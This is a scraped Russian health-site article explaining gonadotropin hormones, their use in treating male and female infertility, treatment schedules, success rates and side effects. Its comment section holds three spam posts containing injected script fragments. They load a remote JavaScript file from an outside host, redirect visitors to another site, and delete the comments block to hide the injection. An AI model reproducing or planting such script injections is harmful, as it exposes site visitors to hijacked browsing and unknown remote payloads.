Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Что такое гонадотропины? ...  >>  Что такое гонадотропины? Помогут ли они забеременеть?
 
Обратная связь
 

Что такое гонадотропины? Помогут ли они забеременеть?

Размер шрифта
03 июня 2013 00:00
  • google_analytics: false
  • Нравится

Гонадотропные гормоны (гонадотропины) – это биологически активные вещества, стимулирующие функцию половых желез (яичников у женщин, яичек у мужчин).

Наш организм продуцирует два типа гонадотропинов: фолликулостимулирующий гормон (ФСГ) и лютеинизирующий гормон (ЛГ). Железа, секретирующая эти гормоны, называется гипофизом и располагается в головном мозге. Гонадотропины стимулируют секрецию других половых гормонов, а также регулируют созревание яйцеклеток и сперматозоидов и влияют на вторичные половые признаки: голос, развитие мышечной массы, оволосение и развитие молочных желез.

Человеческий менопаузальный гонадотропин (чМГ) и рекомбинантный человеческий фолликулостимулирующий гормон (рчФСГ) – это лекарственные аналоги гонадотропинов, применяющиеся при лечении бесплодия.

  • чМГ состоит из ФСГ и ЛГ, выделенных из мочи женщин, находящихся в периоде менопаузы (климакса)
  • рчФСГ – продукт инновационных рекомбинантых технологий, не имеющий в своем составе посторонних белков

Хорионический гонадотропин (ХГЧ) – еще один гонадотропный гормон, он продуцируется плацентой (детским местом) во время беременности и очень важен для благополучного течения последней.

Функция гонадотропинов

У женщин ЛГ и ФСГ необходимы для нормального созревания яйцеклеток и овуляции (это процесс, в ходе которого яйцеклетка покидает яичник и попадает в маточные трубы). Женщинам, у которых имеются проблемы с овуляции из-за низкого уровня этих гормонов, могут назначить чМГ или рчФСГ в виде инъекций (ежедневно на протяжении 12-14 дней). Если всё сложится благополучно, яйцеклетка (фолликул) успеет созреть и будет готова к овуляции.

У мужчин ЛГ стимулирует продукцию тестостерона, а ФСГ – созревание сперматозоидов. Лекарственные гормональные препараты назначают в том случае, если данные спермограммы и анализы на ЛГ и ФСГ дают основание предполагать, что снижение фертильности (способности к деторождению) связано с гормональным дисбалансом. Сначала мужчине прописывают инъекции ХГЧ три раза в неделю до тех пор, пока уровень тестостерона в крови не нормализуется (это может занять 4-6 месяцев). Затем лечение продолжается: ХГЧ вводят дважды в неделю, а чМГ (или рчФСГ) – трижды, до достижения нормальных показателей спермограммы.

В каких случаях применяются препараты гонадотропинов

Таким образом, гонадотропины назначают, чтобы помочь организму восполнить дефицит гормонов, необходимых для созревания яйцеклеток и сперматозоидов.

Следует помнить, что такие препараты может назначить только врач!

У женщин гонадотропины используются:

  • Для стимулирования овуляции,  которая может быть затруднена ввиду недостатка собственных гонадотропинов или эстрогенов
  • Когда использование других препаратов (например, кломифен цитрата) не принесло результата (например, при лечении ановуляторных циклов, при синдроме поликистозных яичников)
  • Для одновременного созревания нескольких яйцеклеток, что необходимо для реализации вспомогательных репродуктивных технологий (таких, как экстракорпоральное оплодотворение и внутриматочная инсеминация)

У мужчин с помощью гонадотропинов корригируют дефекты сперматогенеза (созревания сперматозоидов), связанные с дефицитом внутренних гормонов.

Эффективность 

Использование лекарственных препаратов гонадотропинов весьма эффективно стимулирует овуляцию. В результате такого лечения беременеют примерно 60% женщин с ановуляторными расстройствами.

Побочные эффекты

Лекарственные препараты гонадотропинов обладают следующими побочными эффектами:

  • В 5-10% случается увеличение размеров яичников вследствие появления большего количества фолликулов
  • Синдром гиперстимуляции яичников, который потенциально может стать жизнеугрожающим состоянием. К счастью, при надлежащем врачебном мониторинге, риск развития этого синдрома – менее 1%.
  • Применение гонадотропинов повышает вероятность многоплодной беременности (двойня, тройня и т.д.), которая создает дополнительные риски как для матери, так и для плодов
  • Неспецифические побочные эффекты: головные и абдоминальные боли

Ознакомьтесь с инструкцией или проконсультируйтесь с гинекологом, чтобы больше узнать о побочных эффектах.

Будьте осторожны

Во время курса лечения необходим регулярный мониторинг за развитием фолликулов с помощью ультразвукового исследования и анализов крови. Это важно для того, чтобы не допустить развитие синдрома гиперстимуляции яичников. Это состояние может быть крайне опасным для здоровья женщины. Обычно в легких случаях он сходит на нет спустя 2-4 недели, но женщине может понадобиться госпитализация и специальные врачебные процедуры.

Гонадотропины должны назначаться только опытными гинекологами, которые ориентируются в проблеме бесплодия и в курсе всех возможных осложнений.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 19:33

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 23:15

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всего лишь одно изменение в жизни поможет избежать выкидыша!   Синдром Дауна может быть излечим! Новости из США!   Гормон секса не даст вам наесться!   9000 детей в год умирают в ДТП из-за ошибок родителей. Но все можно предотвратить  
08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Можно ли подгадать с беременностью?
Как увеличить грудное молоко?
Можно ли беременеть после 40?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.